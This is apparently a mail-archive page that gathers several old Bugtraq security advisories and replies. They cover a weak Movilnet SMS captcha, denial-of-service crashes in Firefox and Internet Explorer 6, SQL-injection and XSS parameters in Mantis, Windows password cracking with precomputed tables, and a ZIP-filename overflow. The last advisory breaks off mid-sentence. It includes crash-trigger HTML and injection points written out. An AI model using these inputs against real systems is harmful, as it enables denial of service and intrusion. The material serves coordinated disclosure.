From Cantv's corporative webpage:
Cantv es la compania privada más grande de Venezuela. Desde su 
privatizacion

en 1991, la compania ha experimentado una constante transformacion para
convertirse en una empresa competitiva, con altos niveles de calidad en la
oferta de sus productos y servicios de transmision de voz, datos, acceso a
internet, telefonia celular y directorios de informacion.

Movilnet is an affiliate of Cantv, the largest private telecomunications
company in Venezuela.

Movilnet's Web SMS is a very popular Short Messages System that allows web
surfers to send short text messages directly to Movilnet's mobile phone
subscribers.

Notice


The very popular Movilnet's Web SMS protects its mobile customers from SMS
bombs, and undesirable spam using the mechanism pioneered by Blum's AI 
group

at Carnegie Mellon University that tries to tell humans and computers apart
by using programs known as captchas. Unfortunately, Movilnet's captcha
implementation is a very weak one and it is possible to recognize its 
patterns
100% of the time. Others have previously reported breaking scode based 
captchas,
however no proof of concept source code has ever been released to the 
public.


Vendor Status


SNSecurity has contacted Movilnet, who already knew about the problem
and is currently dealing with the issue.

2/21/2006 Vendor is contacted about the vulnerability.
2/23/2006 Vendor informs the vulnerability was already known and asks
 for a 30 day period before publication.
3/17/2006 Vendor agrees to make the advisory public at the date agreed
 upon.
3/27/2006 Advisory is made public.

Basic Explanation


There are several problems with the scode based captcha used by Movilnet
on their Web Short Message System. Most notoriously, the captcha's 
challenge
space is very reduced. Estimates performed by our research labs indicate 
that
only 16 Mb of memory would be required to store pre-calculated data that 
would

allow for a complete image to response map.

Additionally, several other design flaws present on Movilnet's captcha
implementation allow for the creation of heuristic algorithms that would 
not

require data pre-calculation at all. Most important weaknesses include: only
one font, no color variation, useless perturbation, no rotation and no
deformation.

Proof Of Concept Status


No proof of Concept will be released until the provider has sorted out the
issue.

Work Around


No work around is possible to prevent abusers to spam or sms-bomb mobile
customers. If you are sms-bombed you can only turn off your mobile phone
and ask a Movilnet representative to have your entire short text message
queue deleted.

Corrective Measures


Replace the captcha module for a stronger and more robust implementation.

Credits


This vulnerability was discovered by Ruben Recabarren and Leandro Leoncini
at SNSecurity's Research Lab.

Disclaimer
--
This advisory was released by SNSecurity as a matter of notification to
help administrators protect their systems and to warn mobile customers
against the described vulnerability. Exploit source code is never released
in our advisories but can be obtained under contract. Contact our sales
department at info (at) snsecurity (dot) com for further information on how
to obtain proof of concept code.

--
SNSecurity. http://www.snsecurity.com

Re: Various router DoS

[bugtraq]

I've sent this issue into Linksys referening this post as that I have the 
problem myself.

Re: linksys router + irc DoS

[bugtraq]

Which model of the WRT54G did you test on?

The reason I'm asking is that there are 5 different models (and a few subset 
models too), and only the newest (version 5) run VXWorks, whereas the rest run 
Linux - so it'd be nice to know where the problem is.

Thanks.

-m

[BuHa-Security] DoS Vulnerability in Firefox = 1.0.7

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #8 |Feb 15th, 2006 |
 ---
| Vendor   | Mozilla Firefox|
| URL  | http://www.mozilla.com/firefox/|
| Version  | = 1.0.7   |
| Risk | Low (DoS - Null Pointer Dereference)   |
 ---

This issue was originally (?) discovered by Yuan Qi who posted it on
Bugzilla [1] on 11th November 2004 [2]. I rediscovered this
vulnerability on 1st October 2005 and reported it several weeks later
to the Mozilla Software Foundation [3] because I did not find any
advisory or bugzilla post about this problem..

I decided to release an advisory about this DoS vulnerability, even
though it's an old issue.

o Description:
=

The award-winning Web browser is better than ever. Browse the Web
with confidence - Firefox protects you from viruses, spyware and
pop-ups. Enjoy improvements to performance, ease of use and privacy.

Visit http://www.mozilla.com/firefox/ for detailed information.

o Denial of Service:
===

Following HTML code forces Firefox to crash:
 frameset/frameset
 tablepformmapdltablesmall

Online-demo:
http://morph3us.org/security/pen-te...8143204906.html

The access violation results in a null pointer dereference and is not
exploitable.

o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
 Firefox 1.0.7 - GNU/Linux (Gentoo, Slackware, Debian)
 Firefox 1.0.7 - Solaris
 Firefox 1.0.7 - Windoze 2k / XP SP2
 Firefox 1.0.6 - XP SP2
 Firefox 1.0.4 - GNU/Linux (Gentoo, Slackware, Debian)
 Firefox 1.0.4 - XP SP2
 Firefox 1.0.1 - XP SP2
 Firefox 1.0.0 - XP SP2

o Disclosure Timeline:
=

01 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
15 Feb 06 - Public release.

o Solution:
==

Upgrade to Firefox 1.5.0.1.

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, nait, trappy and all members
of BuHa.

Advisory online:
http://morph3us.org/advisories/20060215-firefox-107.txt

[1] https://bugzilla.mozilla.org/
[2] https://bugzilla.mozilla.org/show_bug.cgi?id=269095
[3] https://bugzilla.mozilla.org/show_bug.cgi?id=320463


-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFD8tg/kCo6/ctnOpYRAz27AJsE1EcyIycMA5XdDnHMJDdhPPk0uQCeK7DX
H+dtwjsf4nkXuHrPR1wFZZM=
=IUWt
-END PGP SIGNATURE-

[BuHa-Security] Multiple Vulnerabilities in Mantis 1.00rc4

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #7 |Feb 14th, 2006 |
 ---
| Vendor   | Mantis BT  |
| URL  | http://www.mantisbt.org/   |
| Version  | = Mantis 1.00rc4  |
| Risk | Moderate   |
 ---

o Description:
=

Mantis is a web-based bugtracking system. It is written in the PHP
scripting language and requires the MySQL database and a webserver.

Visit http://www.mantisbt.org/ for detailed information.

o SQL-Injection:
===

  /manage_user_page.php:
GET: ?sort=last_visit'

The manipulated data of the sort parameter is saved into
MANTIS_MANAGE_COOKIE cookie. The value of the cookie is inserted
into a SQL query and everytime the page is loaded a MySQL database
error is displayed.

  You have an error in your SQL syntax; check the manual that
  corresponds to your MySQL server version for the right syntax
  to use near '\ ASC' at line 4 for the query:
  SELECT *
  FROM mantis_user_table
  WHERE (1 = 1)
  ORDER BY last_visit\' AS

Unexploitable SQL-Injection, temporary defacement.

o XSS:
=

  /view_all_set.php:
GET: ?type=1handler_id=1hide_status=[XSS]
GET: ?type=1handler_id=[XSS]
GET: ?type=1temporary=yuser_monitor=[XSS]
GET: ?type=1temporary=yreporter_id=[XSS]
GET: ?type=6view_type=[XSS]
GET: ?type=1show_severity=[XSS]
GET: ?type=1show_category=[XSS]
GET: ?type=1show_status=[XSS]

GET: ?type=1show_resolution=[XSS]
GET: ?type=1show_build=[XSS]
GET: ?type=1show_profile=[XSS]
GET: ?type=1show_priority=[XSS]

GET: ?type=1highlight_changed=[XSS]
GET: ?type=1relationship_type=[XSS]
GET: ?type=1relationship_bug=[XSS]

  /manage_user_page.php:
GET: ?sort=[XSS]

  /view_filters_page.php:
GET: /view_filters_page.php?view_type=[XSS]

  /proj_doc_delete.php:
GET: ?file_id=1title=[XSS]

o Disclosure Timeline:
=

08 Oct 05 - Security flaws discovered.
17 Nov 05 - Vendor contacted.
15 Dec 05 - Vendor contacted again.
18 Dec 05 - Vendor confirmed vulnerabilities.
18 Dec 05 - Vendor released partly bugfixed version.
19 Dec 05 - Vendor contacted again.
03 Feb 06 - Vendor released bugfixed version.
14 Feb 06 - Public release.

o Solution:
==

Upgrade to Mantis 1.0.0. [1]

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, nait, trappy and all
members of BuHa.

Advisory online: http://morph3us.org/advisories/20060214-mantis-100rc4.txt

[1] http://www.mantisbt.org/download.php

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFD8qCZkCo6/ctnOpYRA3OmAJkBblkaWsqm4Gsmd1kmZmfSiE0tdgCgkPXw
Yw3XgTq5MxLHSGX7hExkDpQ=
=nRmi
-END PGP SIGNATURE-

Windows Access Control Demystified

[sudhakar+bugtraq]

Hello everybody,

We have constructed a logical model of Windows XP access control, in a 
declarative but executable (Datalog) format.  We have built a scanner that 
reads access-control configuration information from the Windows registry, file 
system, and service control manager database, and feeds raw configuration data 
to the model.  Therefore we can reason about such things as the existence of 
privilege-escalation attacks, and indeed we have found several 
user-to-administrator  vulnerabilities caused by misconfigurations of the 
access-control lists of commercial software from several major vendors.  We 
propose tools such as  ours as a vehicle for software developers and system 
administrators to model and debug the complex interactions of access control on 
 installations under Windows.


The full version of the paper can be found at:

http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf


All the vendors and CERT are aware of this paper. The bugs are *not* 
remotely exploitable. The CERT id is VU#953860.


regards,
Sudhakar Govindavajhala and Andrew Appel.

Bio:

Sudhakar Govindavajhala is a finishing PhD student at Computer Science 
department, Princeton  university. His interests are computer security, 
operating systems and networks. Sudhakar is looking for employment  
opportunities.


Andrew Appel is a Professor of Computer Science at Princeton University.  He is 
currently on sabbatcal at INRIA Rocquencourt. His interests are computer 
security, compilers, programming  languages, type theory, and  functional 
programming.

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ---
| BuHa Security-Advisory #4 |Dec 24th, 2005 |
 ---
| Vendor   | M$ Internet Explorer 6.0   |
| URL  | http://www.microsoft.com/windows/ie/   |
| Version  | = 6.0.2900.2180.xpsp_sp2  |
| Risk | Low (DoS - Null Pointer Dereference)   |
 ---
 
o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: mshtml.dll#7d663471
===

Following HTML code forces M$ IE 6 to crash:
 table datasrc=.

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1128216821765-7d663471.html

These are the register values and the ASM dump at the time of the access
violation:
eax= ebx=01293b38 ecx=01293b20 edx=7d74ede0 esi=01293b20
edi= eip=7d663471 esp=0012e89c ebp=0012e89c
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0246

7d663469 8bff mov edi,edi
7d66346b 55   pushebp
7d66346c 8bec mov ebp,esp
7d66346e 8b4110   mov eax,[ecx+0x10]
FAULT -7d663471 66833823 cmp word ptr [eax],0x23   
ds:0023:=
7d663475 7405 jz  mshtml+0x1b347c (7d66347c)
7d663477 33c0 xor eax,eax
7d663479 40   inc eax
7d66347a eb1e jmp mshtml+0x1b349a (7d66349a)
7d66347c ff7508   pushdword ptr [ebp+0x8]
7d66347f 8b09 mov ecx,[ecx]
7d663481 83c002   add eax,0x2
7d663484 50   pusheax
7d663485 e8466cebff   callmshtml+0x6a0d0 (7d51a0d0)
7d66348a 8bc8 mov ecx,eax
7d66348c e8ad44fbff call mshtml!CreateHTMLPropertyPage+0x2432c 
(7d61793e)
7d663491 33c9 xor ecx,ecx
7d663493 85c0 testeax,eax
7d663495 0f9cc1   setlcl
7d663498 8bc1 mov eax,ecx
7d66349a 5d   pop ebp
7d66349b c20400   ret 0x4

The access violation results in a null pointer dereference and is not 
exploitable. 

M$ IE parses the attribute value of 'datasrc' ([n].[m]) in the 
following way:
* Split the attribute value in two parts
* Compare the first char of [n] with 0x23 ('#')

The reason for the crash is that the 0 byte long [n] (no memory is allocated 
for this string) is used without any validation.

For example:
 char *t = NULL;

 if(t[0] = 0x23)


o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
 M$ IE 6.0  - Windoze XP Pro SP2
 M$ IE 6.0  - Windoze 2k SP4
 M$ IE 5.5  - Windoze XP Pro SP2
 M$ IE 5.01 - Windoze XP Pro SP2


o Disclosure Timeline:
=

10 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=

Christian Deneke [EMAIL PROTECTED]

- --

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-1.txt 

-BEGIN PGP SIGNATURE-
Version: n/a   
Comment: http://morph3us.org/

iD8DBQFDrdnDkCo6/ctnOpYRAvLLAKCbjmd+eqqRXDbtfjqNj4ALvJz2aACeM2ZS
i7x/RPte39BmMXHPNZUn2iU=
=6FEe
-END PGP SIGNATURE-

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ---
| BuHa Security-Advisory #5 |Dec 24th, 2005 |
 ---
| Vendor   | M$ Internet Explorer 6.0   |
| URL  | http://www.microsoft.com/windows/ie/   |
| Version  | = 6.0.2900.2180.xpsp_sp2  |
| Risk | Low (DoS - Null Read Dereference)  |
 ---
 
o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: mshtml.dll#7d6c74b1
===

Following HTML code forces M$ IE 6 to crash:
 !DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Frameset//EN
 /samp/colgroupulfontmenu code var
 subh2/fieldset
 /kbd/frameset
 /ins/map/noframes
 /isindex
 /code
 /div/title
 /del/varisindex
 i

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900490843-7d6c74b1.html

These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=0001 edx=012945f0 esi=
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=  efl=0246

7d6c748b 6a0b push0xb
7d6c748d 33c0 xor eax,eax
7d6c748f 59   pop ecx
7d6c7490 8bfe mov edi,esi
7d6c7492 f3ab rep stosd
7d6c7494 8b45f8   mov eax,[ebp-0x8]
7d6c7497 8906 mov [esi],eax
7d6c7499 897228   mov [edx+0x28],esi
7d6c749c e9af01   jmp mshtml+0x217650 (7d6c7650)
7d6c74a1 8b4728   mov eax,[edi+0x28]
7d6c74a4 8b7028   mov esi,[eax+0x28]
7d6c74a7 897728   mov [edi+0x28],esi
7d6c74aa 8b4320   mov eax,[ebx+0x20]
7d6c74ad 668b4002 mov ax,[eax+0x2]
FAULT -7d6c74b1 8b4e24   mov ecx,[esi+0x24]
  ds:0023:0024=
7d6c74b4 66250030 and ax,0x3000
7d6c74b8 662d0010 sub ax,0x1000
7d6c74bc 66f7d8   neg ax
7d6c74bf 897510   mov [ebp+0x10],esi
7d6c74c2 1bc0 sbb eax,eax
7d6c74c4 40   inc eax
7d6c74c5 50   pusheax
7d6c74c6 e80c8efeff   callmshtml+0x2002d7 (7d6b02d7)
7d6c74cb 0fb6c0   movzx   eax,al
7d6c74ce 48   dec eax
7d6c74cf 83f80c   cmp eax,0xc
7d6c74d2 0f877b01 jnbemshtml+0x217653 (7d6c7653)
7d6c74d8 ff2485c7796c7d   jmp dword ptr [mshtml+0x2179c7
  (7d6c79c7)+eax*4]
7d6c74df 8b4e20   mov ecx,[esi+0x20]
7d6c74e2 f6410208 testbyte ptr [ecx+0x2],0x8
7d6c74e6 7419 jz  mshtml+0x217501 (7d6c7501)
7d6c74e8 8b45fc   mov eax,[ebp-0x4]
7d6c74eb ff7014   pushdword ptr [eax+0x14]
7d6c74ee 8b4610   mov eax,[esi+0x10]
7d6c74f1 03460c   add eax,[esi+0xc]
7d6c74f4 50   pusheax
7d6c74f5 e899ba0100   callmshtml+0x232f93 (7d6e2f93)

It appears to be a null read dereference crash which is not exploitable.


o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
 M$ IE 6 SP2 - Win XP Pro SP2
 M$ IE 6 - Win 2k SP4


o Disclosure Timeline:
=

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
20 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=

Christian Deneke [EMAIL PROTECTED]

- --

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-2.txt 

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdsUkCo6/ctnOpYRAuyKAKCs+kRe0D9LEpRSaBV8skBLrIWzPACfS4mU
07WulbyPImV5j9zbwi56gOo=
=JX5G
-END PGP 

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ---
| BuHa Security-Advisory #6 |Dec 24th, 2005 |
 ---
| Vendor   | M$ Internet Explorer 6.0   |
| URL  | http://www.microsoft.com/windows/ie/   |
| Version  | = 6.0.2900.2180.xpsp_sp2  |
| Risk | Low (DoS - Null Pointer Dereference)   |
 ---
 
o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: mshtml.dll#7d6d8eba
===

Following HTML code forces M$ IE 6 to crash:
 acronymddh5applet/caption/appletli/h1

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900617750-7d6d8eba.html

These are the register values and the ASM dump at the time of the access
violation:
eax= ebx=01295390 ecx= edx= esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0246

7d6d8e84 894c2414 mov [esp+0x14],ecx
7d6d8e88 8b8ea400 mov ecx,[esi+0xa4]
7d6d8e8e 24fe and al,0xfe
7d6d8e90 57   pushedi
7d6d8e91 89542410 mov [esp+0x10],edx
7d6d8e95 8954241c mov [esp+0x1c],edx
7d6d8e99 88442420 mov [esp+0x20],al
7d6d8e9d e89912e5ff   callmshtml+0x7a13b (7d52a13b)
7d6d8ea2 8b4c2428 mov ecx,[esp+0x28]
7d6d8ea6 68b2a06e7d   push0x7d6ea0b2
7d6d8eab 8bf8 mov edi,eax
7d6d8ead e89bb7e5ff   callmshtml+0x8464d (7d53464d)
7d6d8eb2 50   pusheax
7d6d8eb3 8bcf mov ecx,edi
7d6d8eb5 e8dfebfdff   callmshtml+0x207a99 (7d6b7a99)
FAULT -7d6d8eba 668b500c mov dx,[eax+0xc]
  ds:0023:000c=
7d6d8ebe 6685d2   testdx,dx
7d6d8ec1 7c39 jl  mshtml+0x228efc (7d6d8efc)
7d6d8ec3 833d50e3747d01   cmp dword ptr [mshtml+0x29e350
  (7d74e350)],0x1
7d6d8eca 0fbffa   movsx   edi,dx
7d6d8ecd 7513 jnz mshtml+0x228ee2 (7d6d8ee2)
7d6d8ecf a14ce3747d   mov eax,[mshtml+0x29e34c
  (7d74e34c)]
7d6d8ed4 8b484c   mov ecx,[eax+0x4c]
7d6d8ed7 8b4134   mov eax,[ecx+0x34]
7d6d8eda 8d147f   lea edx,[edi+edi*2]
7d6d8edd 8b3c90   mov edi,[eax+edx*4]
7d6d8ee0 eb23 jmp mshtml+0x228f05 (7d6d8f05)

The access violation results in a null pointer dereference and is not 
exploitable. 


o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
 M$ IE 6 SP2 - Win XP Pro SP2
 M$ IE 6 - Win 2k SP4


o Disclosure Timeline:
=

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=

Christian Deneke [EMAIL PROTECTED]

- --

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-3.txt 

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdu6kCo6/ctnOpYRAs1cAKCOabmBR3EtFBoMz/wKinVVpU/q/ACeK2kG
A4pamspAa8+NY9TDiCz738s=
=Wga9
-END PGP SIGNATURE-

WELCOME to bugtraq@securityfocus.com

[bugtraq-help]

Hi! This is the ezmlm program. I'm managing the
bugtraq@securityfocus.com mailing list.

I'm working for my owner, who can be reached
at [EMAIL PROTECTED]

Acknowledgment: I have added the address

   archive@mail-archive.com

to the bugtraq mailing list.

Welcome to [EMAIL PROTECTED]

Please save this message so that you know the address you are
subscribed under, in case you later want to unsubscribe or change your
subscription address.

To unsubscribe, send a message to:

[EMAIL PROTECTED]

Please, read the list FAQ. Its available at 
http://online.securityfocus.com/popups/forums/bugtraq/faq.shtml

David Ahmad
[EMAIL PROTECTED]

--- Administrative commands for the bugtraq list ---

I can handle administrative requests automatically. Please
do not send them to the list address! Instead, send
your message to the correct command address:

For help and a description of available commands, send a message to:
   [EMAIL PROTECTED]

To subscribe to the list, send a message to:
   [EMAIL PROTECTED]

To remove your address from the list, just send a message to
the address in the ``List-Unsubscribe'' header of any list
message. If you haven't changed addresses since subscribing,
you can also send a message to:
   [EMAIL PROTECTED]

or for the digest to:
   [EMAIL PROTECTED]

For addition or removal of addresses, I'll send a confirmation
message to that address. When you receive it, simply reply to it
to complete the transaction.

If you need to get in touch with the human owner of this list,
please send a message to:

[EMAIL PROTECTED]

Please include a FORWARDED list message with ALL HEADERS intact
to make it easier to help you.

--- Enclosed is a copy of the request I received.

Return-Path: archive@mail-archive.com
Received: (qmail 5169 invoked from network); 28 Oct 2005 18:14:52 -
Received: from mail2.securityfocus.com (205.206.231.1)
  by lists2.securityfocus.com with SMTP; 28 Oct 2005 18:14:52 -
Received: (qmail 31179 invoked by alias); 29 Oct 2005 00:32:33 -
Received: (qmail 31175 invoked from network); 29 Oct 2005 00:32:33 -
Received: from www.mail-archive.com (64.62.136.189)
  by mail2.securityfocus.com with SMTP; 29 Oct 2005 00:32:33 -
Received: from www.mail-archive.com ([64.62.136.189]) by www.mail-archive.com
  via smtpd (for mail2.securityfocus.com [205.206.231.1]) with ESMTP; 
Fri, 28 Oct 2005 17:33:59 -0700
Received: from archive by localhost.localdomain with local (Exim 4.50)
id 1EVefW-0004JY-AD
for [EMAIL PROTECTED]; Fri, 28 Oct 2005 17:33:58 -0700
To: [EMAIL PROTECTED]
Subject: Re: confirm subscribe to bugtraq@securityfocus.com
Message-Id: [EMAIL PROTECTED]
From: archive@mail-archive.com
Date: Fri, 28 Oct 2005 17:33:58 -0700

To confirm that you would like

Cracking windows passwords in 5 seconds

[bugtraq]

As opposed to unix, windows password hashes can be calculated in advance 
because no salt or other random information si involved. This makes so 
called time-memory trade-off attacks possible. This vulnerability is not 
new but we think that we have the first tool to exploit this.

At LASEC (lasecwww.epfl.ch) we have developed an advanced time-memory 
trade-off method. It is based on original work which was done in 1980 but 
has never been applied to windows passwords. It works by calculating all 
possible hashes in advance and storing some of them in an organized 
table. The more information you keep in the table, the faster the 
cracking will be.

We have implemented an online demo of this method which cracks 
alphanumerical passwords in 5 seconds average (see 
http://lasecpc13.epfl.ch/ntcrack). With the help of 0.95GB of data we can 
find the password after an average of 4 million hash operation. A brute 
force cracker would need to calculate an average of 50% of all hashes, 
which amounts to about 40 billion hases for alphanumerical passwords 
(lanman hash).

More info about the method can be found at in a paper at 
http://lasecwww.epfl.ch/php_code/publications/search.php?ref=Oech03.

  Philippe Oechslin

Re: Can't Preventing exploitation with rebasing

[bugtraq]

All difficulties posed by such a rebasing technique can be conquered.
The only difficulty it presents is getting back to your shellcode.  This
can be overcome easily unless you're remapping kernel memory as well.
The kernel holds secrets to finding loadlibrary and getprocaddress, and a
jmp esp which is all you need to make your shellcode dance.

DIGRESSION:
Dave Litchfield says you can call esp.  I don't know Dave's
relationships with his registers but this doesn't work if I want
to get my eip on top of my shellcode.  Always starts executing a
memory address for me.  Maybe if I took esp out to dinner more
often then I could call it instead of having to jump on top of it.
Dave, any suggestions for the wine list?
END DIGRESSION.

There's no silver bullet for security.  Security is in a fluid state
always, and will always be so.

-Jove

 Brian Hatch [EMAIL PROTECTED] wrote:
  People keep saying but it won't stop everything, and that's true.

   This takes the security versus obscurity argument from the realm of
 personal opinion to one of quantitative statements.  We should have a
 similar goal for this discussion.

Open WebMail 1.71 background magic info

[FreeBSDbr Bugtraq DataBase]

Hello Folks,

Open Webmail is a perl webmail program that runs on UNIX operational systems. 
For more about Open WebMail, it´s official website is http://openwebmail.org/.

Ok, let´s talk about the problem.

I´ve tested Open WebMail 1.71 an when you enter an invalid username (user 
that doesn´t exist on the system), the 
WebMail returns to you a very nice screen like it:

---
Open WebMail ERROR 

user does not exist 

Open WebMail version 1.71 
---

Ok, now try to copy with your mouse the all message that returned to you, 
and...

---
Open WebMail ERROR 

user does not exist 
euid=0, egid=80 80 80, mailgid=6 

Open WebMail version 1.71 
---

...KABOOM! Look what magically appears:

euid=0, egid=80 80 80, mailgid=6

allright, let´s verify the information:

ps aux
root9044  0.0  3.0  3248 2776  ??  R10:29AM   
0:00.40 /usr/bin/perl -T /usr/local/www/cgi-bin/openwebmail/.openwebmail.pl

As you can see above, the perl scrip run as root, and we can know it just 
with the magically information that appears on the very nice screen.

That´s could be the begin for an attack... know information. 

Yeah guys, something is wrong... Some information is better than we can 
imagine, and some information like it to the wrong (or right) guys... :)

Hugs,

Felipe Neuwald
[EMAIL PROTECTED]

--
FreeBSDbr.com.br

R7-0004: Multiple Vendor Long ZIP Entry Filename Processing

[bugtraq-return-6791]

Issues
MIME-Version: 1.0
From: Rapid 7 Security Advisories [EMAIL PROTECTED]
Message-ID:
[EMAIL PROTECTED]
Date: Wed, 2 Oct 2002 22:48:29 -0700
X-MIMETrack: Serialize by Router on Zion/Rapid7/US(Release 5.0.5
|September 22, 2000) at
 10/03/2002 01:48:36 AM,
 Serialize complete at 10/03/2002 01:48:36 AM
Content-Type: text/plain; charset=us-ascii

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

___
 Rapid 7, Inc. Security Advisory

Visit http://www.rapid7.com/ to download NeXpose(tm), our
 advanced vulnerability scanner. Linux and Windows 2000
   versions are available now!
___

   Rapid 7 Advisory R7-0004
   Multiple Vendor Long ZIP Entry Filename Processing Issues

   Published:  October 2, 2002
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0004.txt

   CERT:   CERT Vulnerability Note VU#383779
   http://www.kb.cert.org/vuls/id/383779

   Microsoft:  Microsoft Security Advisory MS02-054
   http://www.microsoft.com/technet/security/bulletin/MS02-054.asp

   CVE:CAN-2002-0370
   http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0370

1. Affected system(s):

   Several different vendors and products were tested.  Many were found
   to be vulnerable.  A partial list of affected vendors follows.

   Detailed results for many vendors are being withheld pending their
   response to the issues described in this advisory.  We encourage
   customers to engage your vendors on this issue if you have any
   questions regarding their handling of specially crafted ZIP files.

   For an up-to-date list of vendor statements, see CERT Vulnerability
   Note VU#383779.

   KNOWN VULNERABLE:
o Microsoft Windows XP
o Microsoft Windows ME
o Microsoft Windows 98 With Plus! Pack
o Lotus Notes R4
o Lotus Notes R5
o Lotus Notes R6 (pre-gold)
o Verity, Inc. KeyView viewing SDK
o Aladdin Systems Stuffit Expander (pre 7.0)

   Apparently NOT VULNERABLE:
o WinRAR is believed to be NOT vulnerable
o WinZip 8.x is believed to be NOT vulnerable
o zlib is believed to be NOT vulnerable

2. Summary

   Products and libraries from multiple vendors are deficient
   in their handling of zip files having entries with long
   filenames.  Typically, opening and/or processing these
   crafted zip files will result in the program crashing or
   exhibiting unpredictable behavior.  There is a possibility
   of arbitrary code execution, but no exploits are known at
   this time.

3. Vendor status and information

   This is a partial list of affected products and vendors.
   We will update our advisory as we get feedback from more
   vendors.  You may check back with us at
   ( http://www.rapid7.com/SecurityResearch.html ).

   Microsoft Windows XP
  Explorer.exe crashes when navigating through specially
  crafted ZIP files.

  The shell (Explorer.exe) in Windows XP provides functionality
  to uncompress ZIP files on-the-fly, and presents them as folders
  that users can navigate through.  There exists a buffer overflow
  in this feature which may allow malicious ZIP files to be
  constructed that execute code upon access.  It should be noted
  that Explorer.exe does not display the filename if it is too
  long.  This may work to an attacker's advantage since suspicious
